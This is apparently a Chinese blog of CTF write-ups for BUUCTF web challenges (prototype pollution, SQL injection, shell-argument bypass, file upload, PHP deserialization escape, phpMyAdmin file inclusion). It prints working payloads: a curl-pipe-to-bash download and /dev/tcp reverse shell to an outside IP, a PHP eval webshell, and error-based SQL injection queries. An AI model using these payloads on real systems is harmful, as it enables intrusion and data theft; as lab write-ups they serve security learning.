115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
constructor() {
this.owner = "whoknows";
this.num = 0;
this.note_list = {};
}

write_note(author, raw_note) {
this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
}

get_note(id) {
var r = {}
undefsafe(r, id, undefsafe(this.note_list, id));
return r;
}

edit_note(id, author, raw) {
undefsafe(this.note_list, id + '.author', author);
undefsafe(this.note_list, id + '.raw_note', raw);
}

get_all_notes() {
return this.note_list;
}

remove_note(id) {
delete this.note_list[id];
}
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
.get(function(req, res) {
res.render('mess', {message: 'please use POST to add a note'});
})
.post(function(req, res) {
let author = req.body.author;
let raw = req.body.raw;
if (author && raw) {
notes.write_note(author, raw);
res.render('mess', {message: "add note sucess"});
} else {
res.render('mess', {message: "did not add note"});
}
})

app.route('/edit_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to edit a note"});
})
.post(function(req, res) {
let id = req.body.id;
let author = req.body.author;
let enote = req.body.raw;
if (id && author && enote) {
notes.edit_note(id, author, enote);
res.render('mess', {message: "edit note sucess"});
} else {
res.render('mess', {message: "edit note failed"});
}
})

app.route('/delete_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to delete a note"});
})
.post(function(req, res) {
let id = req.body.id;
if (id) {
notes.remove_note(id);
res.render('mess', {message: "delete done"});
} else {
res.render('mess', {message: "delete failed"});
}
})

app.route('/notes')
.get(function(req, res) {
let q = req.query.q;
let a_note;
if (typeof(q) === "undefined") {
a_note = notes.get_all_notes();
} else {
a_note = notes.get_note(q);
}
res.render('note', {list: a_note});
})

app.route('/status') //注意点
.get(function(req, res) {
let commands = {
"script-1": "uptime",
"script-2": "free -m"
};
for (let index in commands) {
exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
if (err) {
return;
}
console.log(`stdout: ${stdout}`);
});
}
res.send('OK');
res.end();
})


app.use(function(req, res, next) {
res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
console.error(err.stack);
res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

通过路由/edit_note 污染原型链,然后访问/status触发payload

1
2
3
4
id=__proto__.abc&author=curl%20http://174.1.147.117/shell.txt|bash&raw=a

//shell.txt
bash -i >& /dev/tcp/174.1.147.117/9999 0>&1

image-20200527165626199

[极客大挑战 2019]HardSQL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
GET /check.php?username=aaa&password=0%27or%281%29%23 HTTP/1.1
Host: d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jul 2020 16:54:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 550
Connection: close
X-Powered-By: PHP/7.3.11

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>check</title>
</head>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>

<body background='./image/background.jpg' style='background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;'>
<br><br><br>
<h1 style='font-family:verdana;color:red;text-align:center;font-size:40px;'>Login Success!!</h1>
</br>
</body>

</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(database())))))%23
#XPATH syntax error: ' geek'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(column_name))from(information_schema.columns)where((table_schema)like(database()))))))%23
#XPATH syntax error: ' id,username,password'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php
?username=1
&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))))))%23
#XPATH syntax error: ' H4rDsq1'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php
?username=1
&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(password)from(H4rDsq1)))))%23
#XPATH syntax error: ' flag{9dd67d66-6e19-45bb-9beb-39'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php
?username=1
&password='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(password)from(H4rDsq1)))%2C36)))%23
#XPATH syntax error: 'e19-45bb-9beb-39d277a60ac9}'
# flag{9dd67d66-6e19-45bb-9beb-39d277a60ac9}
http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23
#XPATH syntax error: ',test,geek'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cleft(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23
#XPATH syntax error: ' information_schema,mysql,perfor'

[BUUCTF 2018]Online Tool

PHP escapeshellarg()+escapeshellcmd() 之殇

谈escapeshellarg绕过与参数注入漏洞

  • 源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
  • nmap使用
1
2
3
OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
and Grepable format, respectively, to the given filename.

利用output输出执行记录 从而构造 webshell.php,如下图

image-20200728172147184

将webshell作为查询ip并保存在1.php下

  • 预想思路

本来的想法是再执行一个命令,但如下面说明:

escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$, \x0A 和 \xFF。 ‘ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。

此路不通。

换个思路,写webshell,这一点一开始没想到,看别人博客才知道.

  • 总思路:

利用escapeshellarg()+escapeshellcmd() 绕过',

1
2
3
4
5
string(9) "1' new_IP"
string(14) "'1'\'' new_IP'"
string(16) "'1'\\'' new_IP\'" # '1'\\'' == '1'+\\''
you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9
string(53) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP\'"

在nmap命令中 '1'\\'' == '1' +转意后的\+''(也就是空)

此外对于new_IP\'" 也可以在此利用'进行绕过 如下

1
2
3
4
5
string(23) "1' new_IP -oG new.php '"
string(31) "'1'\'' new_IP -oG new.php '\'''"
string(33) "'1'\\'' new_IP -oG new.php '\\'''"
you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9
string(70) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP -oG new.php '\\'''"

从而构造另一个要查询的ip,也就是webshell

如下:

1
1' <?php phpinfo();?> -oG new.php '

image-20200728174016551

[ACTF2020 新生赛]Upload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
POST / HTTP/1.1
Host: 4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn
Content-Length: 324
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR0XkBShZAZ5y7Yfn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryR0XkBShZAZ5y7Yfn
Content-Disposition: form-data; name="upload_file"; filename="fe1w0.phtml"
Content-Type: image/jpeg


<?php
eval($_GET[xz]);
?>
------WebKitFormBoundaryR0XkBShZAZ5y7Yfn
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryR0XkBShZAZ5y7Yfn--

前端检验+后端黑名单设置

[GXYCTF2019]BabySQli

  • search.php
1
2
3
4
5
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
# base32
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
# base64
select * from user where username = '$name'

此题要是不告诉你,完整的代码逻辑有点坑。

以下代码是BUU的连接,不知道实际比赛时有没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}

$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
printf("Error: %s\n", mysqli_error($con));
exit();
}
else{
// echo '<pre>';
$arr = mysqli_fetch_row($result);
// print_r($arr);
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}

?>
  • 此题的验证逻辑

    • 首先,查询username=$user 的用户信息,并转为数组
    • 若$user 符合黑名单,报错
    • 符合,则判断md5($pw) == password
    • 成功,返回flag
  • 思路

在第一步的得到的表中插入一条数据,如:

1
2
3
4
5
6
7
mysql> select 'admin',md5('fe1w0');
+-------+----------------------------------+
| admin | md5('fe1w0') |
+-------+----------------------------------+
| admin | d49fd2c918d8ab7c3b8111269023f888 |
+-------+----------------------------------+
1 row in set (0.00 sec)

image-20200730005641478

[GYCTF2020]Blacklist

  • 黑名单
1
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
  • 堆叠注入 + HANDLER

mysql查询语句-handler

  • payload
1
http://d819a190-8282-41a9-90a8-72af5b375e27.node3.buuoj.cn/?inject=-1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;

[0CTF 2016]piapiapia

1
PS D:\fe1w0\tool\web & permeation\dirpath_search\dirsearch> python3 .\dirsearch.py -u "http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/" -e php --delay=0.5

根据扫描结果得到www.zip文件

大致运行逻辑:

  • register
  • login 获得session
  • update 更新个人信息,序列化profile
  • profile 将序列化profile进行反序列化

漏洞:

  • class.php - class mysql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
public function update($table, $key, $value, $where) {
$sql = "UPDATE $table SET $key = '$value' WHERE $where";
return mysql_query($sql);
}

public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/'; //即 '/|\\\\/'
$string = preg_replace($escape, '_', $string);

$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i'; //即 '/select|insert|update|delete|where/i'
return preg_replace($safe, 'hacker', $string);
}
  • class.php - class user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
public function show_profile($username) {
$username = parent::filter($username);

$where = "username = '$username'";
$object = parent::select($this->table, $where);
return $object->profile;
}
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);

$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
  • profile.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo'])); // file_get_contents 读取config.php
?>
  • update.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');

if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname'); // 长度大于10可以用数组来绕过

$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');

move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);

$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
  • PHP反序列化逃逸

一个正常的PHP反序列化

1
a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:12:"xzasxzasxzas";}s:5:"photo";s:39:"upload/405ccd25d52f1fbf76ba04be9a371afd";}

想要的PHP反序列化

1
a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:12:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";}

首先只考虑序列化和反序列过程,且假设上传过程中没有处理。

1
2
3
4
5
6
7
<?php
$profile['phone'] =12345678901;
$profile['email'] = "123@123.com";
$profile['nickname'] = ['xzasxzasxzas";}s:5:"photo";s:10:"config.php'];
$profile['photo'] = 'upload/' . md5("xzas");
echo serialize($profile);
//a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:43:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";}s:5:"photo";s:39:"upload/405ccd25d52f1fbf76ba04be9a371afd";}

由于在序列化中nickname的长度为43,反序列化时,也是一直读到;,并没有出现我们想要的结果

1
s:43:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";

但由于执行update_profile()之前会对参数进行过滤,见class.php - class mysql->filter() ,其可以将黑名单中的参数替换成hacker,这样会导致序列化结果产生长度变化。

where->hacker,实际上的字符串长度加一,但序列化中的s:xxxx值没有变化,从而导致PHP反序列化逃逸

  • payload

由于需要挤出去的字符串长度为31,则需要31个where即可

1
2
3
php > $a ='";}s:5:"photo";s:10:"config.php';
php > echo strlen($a);
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$profile['phone'] =12345678901;
$profile['email'] = "123@123.com";
$profile['nickname'] = ['wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php'];
$profile['photo'] = 'upload/' . md5("xzas");
//echo serialize($profile);
function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/'; # /'|\\/
$string = preg_replace($escape, '_', $string); # 将传入的变量中的单引号或反斜线替换为下划线

$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i'; # /select|insert|update|delete|where/
return preg_replace($safe, 'hacker', $string); # 将上述sql关键字替换为hacker
}
echo serialize($profile);
echo "\n";
echo filter(serialize($profile));
echo "\n";
print_r(unserialize(filter(serialize($profile))));
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /update.php HTTP/1.1
Host: 6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn
Content-Length: 171589
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq1cAFarAvJr8wA7F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/update.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=fcce49634c704a465362161ce527a768
Connection: close

------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="phone"

12345678901
------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="email"

123@123.com
------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="nickname[]"

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php

[GXYCTF2019]禁止套娃

  • git泄露

image-20200802002359889

  • git_Extract
1
python .\git_extract.py "http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/.git/"

image-20200802002342452

  • index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>

https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE

https://www.cnblogs.com/wangtanzhi/p/12260986.html

这里采用highlight_file(session_id(session_start()));来过,其他方法可以参考上面的连接

1
2
3
4
5
6
7
8
import requests
url = 'http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/?exp=highlight_file(session_id(session_start()));'
payload = "flag.php"
cookies = {
'PHPSESSID':payload
}
r = requests.get(url=url,cookies=cookies)
print r.content

[SUCTF 2019]Pythonginx

源码:https://github.com/team-su/SUCTF-2019/blob/master/Web/pythonginx

源代码 以及提示

<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
       
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"

参考:https://blog.csdn.net/qq_42181428/article/details/99741920

要绕过1、2两个if判断,且符合第三个判断,才可以读取文件。

利用知识点1、2 构造webshell

1
2
3
4
5
6
7
8
9
10
# coding:utf-8 
for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode('idna').decode('utf-8')
if("-") in res:
continue
print("U:{} A:{} ascii:{} ".format(tmp, res, i))
except:
pass

image-20200802020146751

  • nginx 重要文件

配置文件存放目录:/etc/nginx

主配置文件:/etc/nginx/conf/nginx.conf

管理脚本:/usr/lib64/systemd/system/nginx.service

模块:/usr/lisb64/nginx/modules

应用程序:/usr/sbin/nginx

程序默认存放位置:/usr/share/nginx/html

日志默认存放位置:/var/log/nginx

配置文件目录为:/usr/local/nginx/conf/nginx.conf

https://www.cnblogs.com/wangtanzhi/p/12181032.html

  • payload:
1
2
3
4
5
file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.ⒸⒸ/usr/local/nginx/conf/nginx.conf


server { listen 80; location / { try_files $uri @app; } location @app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } # location /flag { # alias /usr/fffffflag; # } }

[安洵杯 2019]easy_web

https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_web

  • 读取源代码
1
2
3
4
5
6
7
8
9
10
11
12
GET /index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd= HTTP/1.1
Host: 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


  • 源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}

?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
  • payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /index.php?img=&cmd=ca\t%20/flag HTTP/1.1
Host: 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Content-Length: 773
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Origin: http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn/index.php?img=&cmd=ca\t%20/flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

a=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%07%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%f1%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%72%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%34%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%28%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%ab%6f%f7%2a%70&b=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%87%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%71%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%f2%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%b4%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%a8%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%2b%6f%f7%2a%70

[GWCTF 2019]我有一个数据库

image-20200802025004654

  • phpmyadmin 4.8.1任意文件包含 CVE-2018-12613

https://blog.csdn.net/qq_33020901/article/details/80829269

https://blog.51cto.com/13770310/2131305?source=dra

1
2
show variables like 'datadir';
# /var/lib/mysql/
  • payload
1
http://e733f3ba-a431-4612-8a5e-3458d4c9cb30.node3.buuoj.cn/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag

[BJDCTF2020]Mark loves cat

https://github.com/BjdsecCA/BJDCTF2020

推荐用GITHACK,之前那个有问题

  • index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
$$x = $y;
}

foreach($_GET as $x => $y){
$$x = $$y;// $yds = $flag
}

foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}


echo "the flag is: ".$flag;
  • flag.php
1
2
3
<?php

$flag = file_get_contents('/flag');
  • 变量覆盖

